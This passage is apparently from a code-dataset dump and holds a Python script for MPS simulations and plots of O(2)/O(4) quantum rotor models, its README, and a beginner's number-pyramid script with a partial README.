\n \n plt.figure(figsize=(3.5, 2.5))\n plt.subplot(122)\n plt.title('(b) $O(4)$')\n #plot_gap_log(G=2, Ds=[55], max_irs=[4], lowest_en=True, usualg=True,\n # lbl='$D=55$,\\n $l \\\\le 2$', plot_an=True, fmt='bo')\n plot_gap_log(G=2, Ds=[91], max_irs=[4], lowest_en=True, usualg=usualg,\n lbl='$D=91$,\\n $l \\\\le 2$', plot_an=True, fmt='cD',\n fcol='None', ecol='c') \n #plot_gap_log(G=2, Ds=[91], max_irs=[3], lowest_en=True, usualg=True, \n # lbl='$D=91$,\\n $l \\\\le 3/2$', plot_an=False, fmt='ro')\n plot_gap_log(G=2, Ds=[140], max_irs=[3], lowest_en=True, usualg=usualg,\n lbl='$D=140$,\\n $l \\\\le 3/2$', plot_an=False, fmt='r^',\n fcol='None', ecol='r')\n plot_gap_log(G=2, Ds=[140], max_irs=[4], lowest_en=True, usualg=usualg,\n lbl='$D=140$,\\n $l \\\\le 2$', plot_an=False, fmt='bo',\n fcol='None', ecol='b')\n \n plt.legend(frameon=False, loc=3, numpoints=1,\n handlelength=1, fontsize=7)\n #ax = plt.gca()\n #handles, labels = ax.get_legend_handles_labels()\n #ax.legend(handles[::-1], labels[::-1], frameon=False)\n \n #plt.xlim((1.5, 2.6))\n #plt.ylim((0.013, 0.28))\n plt.xlim((1.4, 0.64 * g2i_fac))\n plt.ylim((0.0075, 0.408))\n plt.ylabel('')\n #plt.gca().get_yaxis().set_ticklabels([])\n plt.gca().get_xaxis().set_ticks([1.4, 1.6, 1.8, 2.0, 2.2, 2.4])\n plt.gca().get_xaxis().set_ticklabels(['1.4', '', '1.8', '', '2.0', '', '2.4'])\n plt.tight_layout()\n \n #plt.savefig(\"gap_log_SU2.pdf\")\n\n if not usualg:\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n else:\n g2i_fac = 1\n E_fac = 1\n \n #plt.figure(figsize=(3.5, 2.5))\n plt.subplot(121)\n plt.title('(a) $O(2)$')\n plot_gap_log(G=1, Ds=[32], max_irs=[6], lowest_en=True, usualg=usualg, \n lbl=\"$D=32$,\\n $|n| \\\\le 6$\", fmt='cD',\n fcol='None', ecol='c')\n plot_gap_log(G=1, Ds=[64], max_irs=[5], lowest_en=True, usualg=usualg, \n lbl=\"$D=64$,\\n $|n| \\\\le 5$\", plot_an=False, fmt='b^',\n fcol='None', ecol='r')\n plot_gap_log(G=1, Ds=[64], max_irs=[6], lowest_en=True, usualg=usualg, \n lbl=\"$D=64$,\\n $|n| \\\\le 6$\", plot_an=False, fmt='bo',\n fcol='None', ecol='b')\n \n plt.legend(frameon=False, loc=3, numpoints=1,\n handlelength=1, fontsize=7)\n \n #plt.xlim((0.57, 0.93))\n #plt.ylim((0.0019, 0.73))\n plt.xlim((0.39 * g2i_fac, 0.65 * g2i_fac))\n plt.ylim((0.003 / sp.sqrt(g2i_fac) * E_fac, 1 / sp.sqrt(g2i_fac) * E_fac))\n plt.gca().get_xaxis().set_ticks([0.55, 0.6, 0.65, 0.7, 0.75, 0.80, 0.85, 0.9])\n plt.gca().get_xaxis().set_ticklabels(['', '0.6', '', '0.7', '', '0.8', '', '0.9'])\n plt.tight_layout()\n plt.subplots_adjust(left=0.14, right=0.99, top=0.92, bottom=0.15, wspace=0.3)\n \n plt.savefig(\"gap_logs.pdf\")\n \ndef pub_plot_beta(usualg=False):\n import matplotlib.pyplot as plt\n \n if usualg:\n g2i_fac = 4\n E_fac = 1\n else:\n g2i_fac = 1\n E_fac = 1. 
\n \n plt.figure(figsize=(3.5, 2.5))\n plt.subplot(122)\n plt.title('(b) $O(4)$')\n plot_beta(G=2, Ds=[91], max_irs=[4], lowest_en=True, usualg=usualg,\n lbl='$D=91$, \\n $l \\le 2$', plot_an=True, fmt='cD',\n ecol='c', fcol='None') \n plot_beta(G=2, Ds=[140], max_irs=[3], lowest_en=True, usualg=usualg,\n lbl='$D=140$, \\n $l \\le 3/2$', plot_an=False, fmt='r^',\n ecol='r', fcol='None')\n plot_beta(G=2, Ds=[140], max_irs=[4], lowest_en=True, usualg=usualg, \n lbl='$D=140$, \\n $l \\le 2$', plot_an=False, fmt='bo',\n ecol='b', fcol='None')\n \n #plt.legend(frameon=False, loc=2)\n ax = plt.gca()\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles[::-1], labels[::-1], frameon=False, loc=2, numpoints=1,\n handlelength=1, fontsize=7)\n \n #plt.xlim((1.5, 2.6))\n #plt.ylim((0.013, 0.28))\n plt.xlim((0, 0.713))\n plt.ylim((0, 0.275))\n plt.ylabel('')\n plt.gca().get_xaxis().set_ticks([0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7])\n plt.gca().get_xaxis().set_ticklabels(['0.0', '', '0.2', '', '0.4', '', \n '0.6', '']) \n plt.tight_layout()\n \n #plt.savefig(\"beta_SU2.pdf\")\n\n if usualg:\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n else:\n g2i_fac = 1\n E_fac = 1\n \n #plt.figure(figsize=(1.5, 2.5))\n plt.subplot(121)\n plt.title('(a) $O(2)$')\n plot_beta(G=1, Ds=[32], max_irs=[6], lowest_en=True, usualg=usualg,\n lbl='$D=32$, \\n $|n| \\le 6$', plot_an=True, fmt='cD',\n ecol='c', fcol='None')\n plot_beta(G=1, Ds=[64], max_irs=[5], lowest_en=True, usualg=usualg, \n lbl='$D=64$, \\n $|n| \\le 5$', plot_an=False, fmt='r^',\n ecol='r', fcol='None')\n plot_beta(G=1, Ds=[64], max_irs=[6], lowest_en=True, usualg=usualg, \n lbl='$D=64$, \\n $|n| \\le 6$', plot_an=False, fmt='bo',\n ecol='b', fcol='None')\n \n ax = plt.gca()\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles[::-1], labels[::-1], frameon=False, loc=2, numpoints=1,\n handlelength=1, fontsize=7)\n \n #plt.xlim((0.57, 0.93))\n #plt.ylim((0.0019, 0.73))\n plt.xlim((1.0, 1.543))\n plt.ylim((0, 0.2))\n plt.tight_layout()\n \n plt.subplots_adjust(left=0.1275, right=0.99, top=0.92, bottom=0.14, wspace=0.25)\n \n plt.savefig(\"betas.pdf\")\n\ndef pub_plot_cc():\n import matplotlib.pyplot as plt\n \n plot_cc(sp.arange(22, 88, 6), G=1, pars=[0.75, 0.8, 0.85, 0.9], \n max_ir=5, offset=0.1) \n plt.figure(2)\n #plt.gca().legend_.remove()\n plt.legend(loc=2, fancybox=True)\n plt.tight_layout()\n \n plt.savefig(\"cc_U1.pdf\")\n \ndef pub_plot_SB_extrap():\n import matplotlib.pyplot as plt\n \n D2 = sp.array([14, 30, 55, 91, 140, 204])\n g2 = sp.array([0.502, 0.522, 0.577, 0.608, 0.653, 0.677])\n \n D1 = sp.array([32, 48, 64, 96, 128])\n g1 = sp.array([0.607, 0.613, 0.619, 0.623, 0.626])\n \n p, cov = sp.polyfit(1./D1, 1./g1, deg=1, cov=True)\n xs = sp.linspace(0, 0.05, num=2)\n \n plt.figure(figsize=[2.5, 2.])\n \n g2i_fac = 1#sp.sqrt(2)\n plt.plot(1./D1, 1./g1 / g2i_fac, '^', label='$U(1) \\\\sim O(2)$', markersize=3.5, markeredgewidth=0.5,\n markeredgecolor='b', markerfacecolor='None')\n \n g2i_fac = 1#4\n plt.plot(1./D2, 1./g2 / g2i_fac, 'D', label='$SU(2) \\\\sim O(4)$', markersize=3.5, markeredgewidth=0.5,\n markeredgecolor='r', markerfacecolor='None')\n \n g2i_fac = 1# sp.sqrt(2) \n plt.plot(xs, sp.polyval(p, xs) / g2i_fac, 'k-', \n label='$\\\\tilde g_{\\mathrm{BKT}} \\\\approx %.3f \\\\pm %.3f$' % (p[1] / sp.sqrt(2),\n sp.sqrt(cov[1,1])/sp.sqrt(2)))\n #plt.gca().legend_.remove()\n l = plt.legend(loc=4, frameon=True, fancybox=True)\n l.get_frame().set_linewidth(0.4)\n plt.xlabel(\"$1/D$\")\n 
#plt.ylabel(\"$\\\\tilde g_{\\mathrm{SB}}$\")\n plt.ylabel(\"$g^2_{\\mathrm{SB}}$\")\n plt.tight_layout()\n plt.subplots_adjust(left=0.125, right=0.96, top=0.96, bottom=0.17)\n \n plt.savefig(\"SB_extrap.pdf\")\n\ndef plot_pd():\n import matplotlib.pyplot as plt\n #import matplotlib.patches as mpatches\n \n plt.rcParams['text.usetex'] = True\n plt.rcParams['ps.usedistiller'] = 'xpdf'\n plt.rcParams['font.size'] = 7\n plt.rcParams['font.family'] = 'serif'\n plt.rcParams['font.serif'] = 'Computer Modern Roman'\n \n plt.rcParams['figure.subplot.bottom'] = 0.\n plt.rcParams['figure.subplot.left'] = 0.\n plt.rcParams['figure.subplot.top'] = 1.\n plt.rcParams['figure.subplot.right'] = 1.\n \n left = -10\n right = 10\n \n t1 = 0.3\n t2 = 5\n \n ratio = 0.3\n \n paper_width = 3.4\n \n plt.figure(figsize=(paper_width, paper_width * ratio), frameon=False)\n plt.plot([left, right], [1, 1], '-', color='0.5', linewidth=1)\n plt.plot([left, t1], [1, 1], 'b--', linewidth=1)\n plt.plot([t1, t2], [1, 1], 'r--', linewidth=1)\n plt.plot([t2, right], [1, 1], 'k--', linewidth=1)\n plt.plot([left - 2, left], [1, 1], ':', color='0.5', linewidth=1)\n plt.plot([right, right + 2], [1, 1], ':', color='0.5', linewidth=1)\n \n plt.plot([0, 0], [0.5, 1.5], 'k', linewidth=0.5)\n \n plt.plot([t1, t1], [-0.5, 2.5], 'k', linewidth=1)\n plt.plot([t2, t2], [-0.5, 2.5], 'k', linewidth=1)\n \n plt.text(t1, 2.8, \"second\\n order\", horizontalalignment=\"center\")\n plt.text(t1, -1.3, \"$\\\\sim %g$\" % t1, horizontalalignment=\"center\")\n plt.text(t2, 2.8, \"BKT\", horizontalalignment=\"center\")\n plt.text(t2, -1.3, \"$\\\\sim %g$\" % t2, horizontalalignment=\"center\")\n \n plt.text(left - 2, -1.3, \"$\\\\kappa:$\", horizontalalignment=\"left\")\n \n plt.text(left, -1.3, \"$%g$\" % left, horizontalalignment=\"center\")\n plt.text(right, -1.3, \"$%g$\" % right, horizontalalignment=\"center\")\n \n plt.text(left + (t1 - left)/2, 1.5, \"Ising\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(left + (t1 - left)/2, 0.5, \"$c=0.5$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t1 + (t2 - t1)/2, 1.5, \"floating\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t1 + (t2 - t1)/2, 0.5, \"$c=1.5$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t2 + (right - t2)/2, 1.5, \"antiphase\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t2 + (right - t2)/2, 0.5, \"gapped\", horizontalalignment=\"center\", verticalalignment=\"center\")\n \n ax = plt.gca()\n #p = mpatches.Circle((1.1, 1), 0.2, fc=\"w\")\n #ax.add_patch(p)\n #ax.annotate(\"$c=1.5$\", (1.1, 1), (1.1, -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"$c=0.5$\", (-10., 1), (-10., -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"$c=0.5$\", (-2., 1), (-2., -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"$c=0.5$\", (-1., 1), (-1., -1), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"no CFT\", (10, 1), (10, -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n \n height = (right - left + 4) * ratio\n plt.ylim(1 - height / 2, 1 + height / 2)\n plt.xlim(left - 2, right + 2)\n \n ax.set_axis_off()\n# ax.get_yaxis().set_visible(False)\n# ax.spines['left'].set_visible(False)\n# ax.spines['right'].set_visible(False)\n# ax.spines['top'].set_visible(False)\n# ax.spines['bottom'].set_visible(False)\n #plt.tight_layout()\n plt.show()\n\ndef get_ground(s, D_targ, 
ops, step_init=0.04, tol=1E-8, expand_tol=None, D_step=2, \n use_CG=True, par_str='', CG_start_tol=1E-1):\n print \"Bond dimension: \" + str(s.D)\n print\n col_heads = [\"par\", \"Step\", \"<h>\", \"d<h>\", \"corrlen\"] + [\"Sz\"] * s.L + [\"eta\"]\n print \"\\t\".join(col_heads)\n print\n \n U, P, P2, ReUUH, ReUUH_tp = ops\n\n \"\"\"\n Create a function to print out info during the solver iterations.\n \"\"\"\n h_prev = [0]\n def cbf(s, i, **kwargs):\n h = s.h_expect.real\n\n row = []\n \n row.append(par_str)\n \n row.append(str(i))\n\n row.append(\"%.15g\" % h)\n\n dh = h - h_prev[0]\n h_prev[0] = h\n\n row.append(\"%.2e\" % (dh))\n \n if i % 10 == 0:\n cl = s.correlation_length().real\n else:\n cl = sp.nan\n row.append(\"%.2e\" % (cl))\n\n \"\"\"\n Compute expectation values!\n \"\"\"\n exUs = []\n for k in xrange(s.L):\n exUs.append(\"%.3g\" % s.expect_1s(U[0][0], k=k).real)\n row += exUs\n \n exP2s = []\n for k in xrange(s.L):\n exP2s.append(\"%.3g\" % s.expect_1s(P2, k=k).real)\n row += exP2s\n \n row += map(lambda k: \"%.6g\" % s.entropy(k).real, range(s.L))\n \n row.append(\"%.6g\" % s.eta.real)\n\n row.append(str(kwargs))\n\n print \"\\t\".join(row)\n\n\n if use_CG:\n dy.find_ground(s, tol=tol, h_init=step_init, expand_to_D=D_targ, \n expand_step=D_step, expand_tol=expand_tol, cb_func=cbf,\n CG_start_tol=CG_start_tol)\n else:\n dy.opt_im_time(s, tol=tol, dtau_base=step_init, expand_to_D=D_targ,\n cb_func=cbf, auto_trunc=True)\n \n if s.eta.real < tol:\n s.update()\n return s\n \n\ndef calc_excite(s, num_mom=20, num_exc=20, v0=None):\n \"\"\"\n Find excitations if we have the ground state.\n \"\"\"\n print 'Finding excitations!'\n\n ex_ev = []\n ex_p = []\n for p in sp.linspace(0, sp.pi, num=num_mom):\n print \"p = \", p\n ev, eV = s.excite_top_triv(p, k=num_exc, ncv=num_exc * 4,\n return_eigenvectors=True, v0=v0)\n print ev\n \n #Use previous momentum lowest eigenvector as a starting point\n ind = ev.argmin()\n v0 = eV[:, ind]\n \n ex_ev.append(ev) \n ex_p.append([p] * num_exc)\n \n ex_ev = sp.array(ex_ev).ravel()\n ex_p = sp.array(ex_p).ravel()\n return sp.column_stack((ex_p, ex_ev)), v0\n \ndef get_grid_1d(a, b, step=0.0001, dp=4):\n a = sp.around(a * 10**dp)\n b = sp.around(b * 10**dp)\n step = sp.around(step * 10**dp)\n \n return sp.arange(a, b + step, step, dtype=int) / 10.0**dp\n \ndef load_state(G, g2inv, D, L, max_ir, loc='state_data/', par_tol=1E-8, \n from_file=None, ops=None, ret_res_row=False):\n if from_file is None:\n ress = sp.genfromtxt(RES_LOAD_FROM, delimiter=\"\\t\",\n dtype=None)\n intref = sp.array([G, D, L, max_ir], dtype=int)\n fns = []\n ens = []\n resrs = []\n for res in ress:\n ints = sp.array([res[cols[s]] for s in ['G', 'D', 'L', 'max_ir']], dtype=int)\n if (sp.all(ints == intref) and \n sp.allclose(res[cols['g2inv']], g2inv, atol=par_tol)):\n fns.append(res[cols['fn']])\n ens.append(res[cols['energy']])\n resrs.append(res)\n else:\n fns = [from_file]\n ens = [0]\n resrs = [None]\n \n print ens\n print fns\n if len(fns) > 0:\n ens = sp.array(ens)\n ind = ens.argmin()\n fn = fns[ind]\n print \"Choosing lower energy, delta =\", ens.max() - ens[ind]\n resr = resrs[ind]\n \n if ops is None:\n ops = get_ops(G, max_ir)\n s = create_tdvp(D, get_ham(g2inv, ops), L=L, ham_tp=get_ham_tp(g2inv, ops))\n s.load_state(loc + fn)\n if ret_res_row:\n if resr is None:\n resr = get_res_row(s, G, g2inv, max_ir, ops=ops)\n return s, resr\n else:\n return s\n else:\n print \"No state found!\", g2inv, D, L\n if ret_res_row:\n return None, None\n else:\n return None\n\ndef 
calc_wv_gap(s_in, v0=None, blocking_D_limit=24, calc_gap=True, nev=20): \n evs = s_in._calc_E_largest_eigenvalues(k=4, ncv=None)\n if len(evs) > 1:\n ind = abs(evs).argmax()\n mask = sp.ones((len(evs)), dtype=bool)\n mask[ind] = False\n ind_wv = abs(evs[mask]).argmax()\n wv = sp.angle(evs[mask][ind_wv])\n else:\n wv = 0.\n \n if calc_gap:\n if s_in.L > 1 and s_in.D <= blocking_D_limit:\n s = copy.deepcopy(s_in)\n s.convert_to_TI_blocked()\n else:\n s = s_in\n\n try:\n evs, eVs = s.excite_top_triv(wv, nev=4, v0=v0, return_eigenvectors=True, tol=1E-11, pinv_tol=1E-12)\n ind = evs.argmin()\n v0 = eVs[:, ind]\n gap = evs[ind]\n except tdvp.EvoMPSNoConvergence:\n gap = sp.NaN\n else:\n gap = sp.NaN\n \n return wv, gap, v0\n \ndef scan(g2inv1, g2inv2, G=1, step=0.01, D=16, D_init=8, D_step=2, L=1, max_ir=5,\n tol=1E-8, expand_tol=None, CG_start_tol=1E-1, h_init=0.04,\n load_first=True, load_tol=1E-8, start_state=None, calc_gap=True):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n ops = get_ops(G, max_ir)\n \n if not start_state is None:\n s = start_state\n elif load_first:\n s = load_state(G, pars[0], D, L, max_ir, par_tol=load_tol, ops=ops)\n if not s is None:\n if load_tol <= 1E-8:\n pars = pars[1:]\n else:\n s = load_state(G, pars[0], D_init, L, max_ir, par_tol=load_tol, ops=ops)\n print \"Trying to load at D_init for\", pars[0]\n \n if s is None:\n print \"State not found for\", pars[0]\n return\n else:\n s = None\n \n v0 = None\n for par in pars:\n if s is None:\n s = create_tdvp(D_init, get_ham(par, ops), L=L, ham_tp=get_ham_tp(par, ops))\n else:\n s.set_ham(get_ham(par, ops))\n s.ham_tp = get_ham_tp(par, ops)\n \n s = get_ground(s, D, ops, tol=tol, par_str=str([par, D, L]), \n D_step=D_step, expand_tol=expand_tol, \n CG_start_tol=CG_start_tol, step_init=h_init)\n if not s is None:\n wv, gap, v0 = calc_wv_gap(s, v0=v0, calc_gap=calc_gap)\n resrow = save_result(s, G, par, max_ir, wv=wv, gap_wv=gap, v0=v0, ops=ops)\n else:\n resrow = None\n print \"Failed to get ground for\", par\n \n return s, resrow\n \ndef fg_one(g2inv, D, G=1, L=1, max_ir=5, tol=1E-8, load_tol=1E-1, calc_gap=True):\n scan(g2inv, g2inv, G=G, D=D, D_init=D, L=L, max_ir=max_ir, tol=tol, load_first=True,\n load_tol=load_tol, calc_gap=calc_gap)\n\ndef fine_grain(g2inv1, g2inv2, G=1, step=0.01, D=16, L=1, max_ir=5, tol=1E-8, \n mprocs=1, load_tol=1E-1, calc_gap=True):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n if mprocs > 1:\n from multiprocessing import Pool\n p = Pool(mprocs)\n resobjs = [p.apply_async(fg_one, args=(par, D), \n kwds={'L': L,\n 'max_ir': max_ir,\n 'tol': tol,\n 'load_tol': load_tol,\n 'calc_gap': calc_gap,\n 'G': G})\n for par in pars]\n for ro in resobjs:\n ro.get()\n else:\n for par in pars:\n fg_one(par, D, G=G, L=L, max_ir=max_ir, tol=tol, load_tol=load_tol,\n calc_gap=calc_gap)\n \ndef expand_one(g2inv, D_init, D, D_step, G=1, L=1, max_ir=5, tol=1E-8, calc_gap=True, \n load_from=None, D_step_intern=2, expand_tol=None,\n until_conv_in=None, conv_tol=1E-4, try_to_load_allD=False):\n D_targ = D_init\n s, resr = load_state(G, g2inv, D_init, L, max_ir, from_file=load_from,\n ret_res_row=True)\n \n conv_vals = []\n sL = None\n while D_targ < D:\n D_prev = D_targ\n D_targ += D_step\n if not until_conv_in is None:\n conv_vals.append(resr[cols[until_conv_in]])\n if len(conv_vals) > 1:\n diff = abs((conv_vals[-1] - conv_vals[-2]) / conv_vals[-1])\n print \"Convergence check (\" + until_conv_in + \"):\", conv_vals, diff\n if diff < conv_tol:\n print \"Converged!\"\n break\n if try_to_load_allD:\n sL, resrL = 
load_state(G, g2inv, D_targ, L, max_ir, ret_res_row=True)\n if sL is None:\n s, resr = scan(g2inv, g2inv, G=G, D=D_targ, D_init=D_prev, L=L, \n max_ir=max_ir, tol=tol, \n load_first=False, start_state=s, calc_gap=calc_gap,\n D_step=D_step_intern, expand_tol=expand_tol)\n else:\n s = sL\n resr = resrL\n\ndef expand_existing(g2inv1, g2inv2, G=1, step=0.01, D=16, D_init=8, D_step=2, L=1, \n max_ir=5, until_conv_in=None, conv_tol=1E-4,\n tol=1E-8, mprocs=1, calc_gap=True, D_step_intern=2,\n expand_tol=None, try_to_load_allD=False):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n if mprocs > 1:\n from multiprocessing import Pool\n p = Pool(mprocs)\n resobjs = [p.apply_async(expand_one, args=(par, D_init, D, D_step), \n kwds={'G': G,\n 'L': L,\n 'max_ir': max_ir,\n 'tol': tol,\n 'calc_gap': calc_gap,\n 'D_step_intern': D_step_intern,\n 'expand_tol': expand_tol,\n 'until_conv_in': until_conv_in,\n 'conv_tol': conv_tol,\n 'try_to_load_allD': try_to_load_allD})\n for par in pars]\n for ro in resobjs:\n ro.get()\n else:\n for par in pars:\n expand_one(par, D_init, D, D_step, G=G, L=L, max_ir=max_ir, tol=tol, \n calc_gap=calc_gap, D_step_intern=D_step_intern,\n expand_tol=expand_tol, until_conv_in=until_conv_in,\n conv_tol=conv_tol, try_to_load_allD=try_to_load_allD)\n\n#def gap_existing_one(g2inv, D, G=1, L=1, max_ir=5, tol=1E-8, calc_gap=True, \n# load_from=None, excite_tol=0, pinv_tol=1E-12):\n# s, resr = load_state(G, g2inv, D, L, max_ir, from_file=load_from,\n# ret_res_row=True)\n# \n# \n# \n#def gap_existing(g2inv1, g2inv2, G=1, step=0.01, D=16, D_init=8, D_step=2, L=1, \n# max_ir=5, until_conv_in=None, conv_tol=1E-4,\n# tol=1E-8, mprocs=1, calc_gap=True, D_step_intern=2,\n# expand_tol=None, try_to_load_allD=False):\n# pars = get_grid_1d(g2inv1, g2inv2, step)\n# \n# if mprocs > 1:\n# from multiprocessing import Pool\n# p = Pool(mprocs)\n# resobjs = [p.apply_async(gap_existing_one, args=(par, D_init, D, D_step), \n# kwds={'G': G,\n# 'L': L,\n# 'max_ir': max_ir,\n# 'tol': tol,\n# 'calc_gap': calc_gap,\n# 'D_step_intern': D_step_intern,\n# 'expand_tol': expand_tol,\n# 'until_conv_in': until_conv_in,\n# 'conv_tol': conv_tol,\n# 'try_to_load_allD': try_to_load_allD})\n# for par in pars]\n# for ro in resobjs:\n# ro.get()\n# else:\n# for par in pars:\n# gap_existing_one(par, D_init, D, D_step, G=G, L=L, max_ir=max_ir, tol=tol, \n# calc_gap=calc_gap, D_step_intern=D_step_intern,\n# expand_tol=expand_tol, until_conv_in=until_conv_in,\n# conv_tol=conv_tol, try_to_load_allD=try_to_load_allD)\n \ndef reprocess_existing(new_res_file, recalc_gap=False):\n oldcols = {'G': 0,\n 'g2inv': 1, \n 'D': 2, \n 'L': 3,\n 'max_ir': 4,\n 'eta': 5, \n 'energy': 6, \n 'cl': 7, \n 'entr_max': 8, \n 'U_av': 9, \n 'U_0': 10,\n 'U2_0': 11,\n 'P_av': 12,\n 'P_0': 13,\n 'P2_0': 14,\n 'ReUUH_av': 15,\n 'ReUUH_0': 16,\n 'ReUUH2_0': 17,\n 'wv_dom': 18, \n 'wv_fit': 19, \n 'gap': 20, \n 'exc_fn': 21,\n 'fn': 22} \n \n ress = sp.genfromtxt(RES_LOAD_FROM, delimiter=\"\\t\", dtype=None)\n \n for res in ress:\n print \"processing:\", res\n G = res[oldcols['G']]\n g2inv = res[oldcols['g2inv']]\n D = res[oldcols['D']]\n L = res[oldcols['L']]\n max_ir = res[oldcols['max_ir']]\n fn = res[oldcols['fn']]\n \n wv = res[oldcols['wv_dom']]\n gap = res[oldcols['gap']]\n \n ops = get_ops(G, max_ir)\n s = create_tdvp(D, get_ham(g2inv, ops), L=L, ham_tp=get_ham_tp(g2inv, ops))\n s.load_state('state_data/' + fn)\n s.update()\n s.calc_B()\n if recalc_gap:# or sp.isnan(gap):\n wv, gap, v0 = calc_wv_gap(s)\n\n save_result(s, G, g2inv, max_ir, wv=wv, 
gap_wv=gap, existing_fn=fn, \n res_file=new_res_file, ops=ops)\n \ndef calc_gap_existing(new_res_file, g2inv1, g2inv2, G=1, step=0.01, D=16, \n L=1, max_ir=5, recalc=False, max_U00=1000):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n ops = get_ops(G, max_ir) \n \n ress = sp.genfromtxt(RES_LOAD_FROM, delimiter=\"\\t\", dtype=None)\n\n resf = open(new_res_file, 'a')\n fcntl.flock(resf, fcntl.LOCK_EX)\n \n v0 = None\n \n for res in ress:\n if (G == res[cols['G']]\n and D == res[cols['D']]\n and L == res[cols['L']]\n and max_ir == res[cols['max_ir']]\n and abs(res[cols['U_0']]) < max_U00\n and sp.any(abs(pars - res[cols['g2inv']]) < 1E-8)\n and (recalc or sp.isnan(res[cols['gap']]))):\n print \"processing:\", res\n g2inv = res[cols['g2inv']]\n fn = res[cols['fn']]\n s = create_tdvp(D, get_ham(g2inv, ops), L=L, ham_tp=get_ham_tp(g2inv, ops))\n s.load_state('state_data/' + fn)\n s.update()\n s.calc_B()\n wv, gap, v0 = calc_wv_gap(s, v0=v0)\n print \"Gap:\", gap, \"previously\", res[cols['gap']]\n res[cols['wv_dom']] = wv\n res[cols['gap']] = gap\n resf.flush()\n \n resf.write(\"\\t\".join(map(str, res)) + \"\\n\")\n \n resf.close()\n #sp.savetxt(new_res_file, ress)\n #save_result(s, G, g2inv, max_ir, wv=wv, gap_wv=gap, existing_fn=fn, \n # res_file=new_res_file, ops=ops)\n \ndef move_data():\n ress = sp.genfromtxt('petal_res.txt', delimiter=\"\\t\", usecols=(-1), dtype=None)\n for res in ress:\n shutil.move(res, 'state_data/' + res)\n"
},
{
"alpha_fraction": 0.7637655138969421,
"alphanum_fraction": 0.7868561148643494,
"avg_line_length": 79.42857360839844,
"blob_id": "113dde05b26a266abd7b8c2772e3fd3709b49104",
"content_id": "9767ea5c89dcf2a3feeb235cf359b07f86a73432",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 563,
"license_type": "permissive",
"max_line_length": 312,
"num_lines": 7,
"path": "/README.md",
"repo_name": "amilsted/mps-rotors",
"src_encoding": "UTF-8",
"text": "# mps-rotors\nPython code for simulating the O(2) and O(4) rotor models using evoMPS (http://amilsted.github.io/evoMPS/).\nIt currently depends on the development branch of evoMPS.\nThis code was used in: http://arxiv.org/abs/1507.06624\n\n## Description\nThis is a library of functions for computing uniform matrix product state (MPS) ground states for the O(2) and O(4) quantum rotor models and processing and visualizing the results. It is also possible to compute low-lying excited states using the uniform MPS tangent space, including computation of the mass gap.\n"
}
] | 2 |
yuma3496/Capstone_Project_2
|
https://github.com/yuma3496/Capstone_Project_2
|
d44ae629cfdcf48b1e0978edbd28f57a9c77dc30
|
de70f21ba8f02f0bc190fef71e2ee629920378fd
|
458e853e5ee68f02411e3a1337edf105f644e970
|
refs/heads/main
| 2023-03-16T22:03:40.476639 | 2021-03-09T06:24:17 | 2021-03-09T06:24:17 | 345,892,961 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3206590712070465,
"alphanum_fraction": 0.4233206510543823,
"avg_line_length": 34.90909194946289,
"blob_id": "97643fbdf7d8f4e1f5111ef56acb0fa1f9128142",
"content_id": "c8ceb689753ae5a5df1e113b58afa69d7582237d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 22,
"path": "/TriTable.py",
"repo_name": "yuma3496/Capstone_Project_2",
"src_encoding": "UTF-8",
"text": "# ================= Compulsory Task =================\n# Write a program that uses nested for loops to create the following number pyramid.\n# 1\n# 2 4 \n# 3 6 9\n# 4 8 12 16\n# 5 10 15 20 25\n# 6 12 18 24 30 36\n# 7 14 21 28 35 42 49\n# 8 16 24 32 40 48 56 64\n# 9 18 27 36 45 54 63 72 81\n# ================= Compulsory Task =================\n\n# Ask user input for the number of rows\nmax_range = int(input(\"Enter the number of lines you want to create: \"))\n\n# Create nested loops and print it out\nfor i in range(1, max_range + 1):\n x = \" \"\n for j in range(1, i + 1):\n x = x + str(i * j) + \" \"\n print(x)"
},
{
"alpha_fraction": 0.7786217927932739,
"alphanum_fraction": 0.7851329445838928,
"avg_line_length": 75.79166412353516,
"blob_id": "107a6b0631631c678998d00bd6e8590108f69634",
"content_id": "70b1b714ec1e4644581ccc40045d238094682ff1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1843,
"license_type": "no_license",
"max_line_length": 377,
"num_lines": 24,
"path": "/README.md",
"repo_name": "yuma3496/Capstone_Project_2",
"src_encoding": "UTF-8",
"text": "# A Simple Pyramid Game\n\n## Description:\nThis simple pyramid game is written in Python.\n\n## Functionality\nWhen run, this program prompts input for number of lines you want to create. After inputting the number and hitting Enter, it displays the pyramid with numbers. The screenshot below is an example when inputting '15'. \n\n## Screenshot\n\n\n## How can I use it?\n1. You need to close this repository to your local repository on your computer, so that you can access and run the program. Below is the details of the GitHub help page:\n - https://help.github.com/en/github/creating-cloning-and-archiving-repositories/cloning-a-repository\n \n2. To run this program, download the Python interpreter program onto your computer's operating system so this program can be excuted. Navigate the following website to download Python on your OS:\n - https://www.python.org/downloads/\n \n3. When opened, the IDLE python file will display a Python 'shell' window. From this window, you can now click on 'file' and then 'open' from the toolbar at the top of the window, to navigate to the Finance 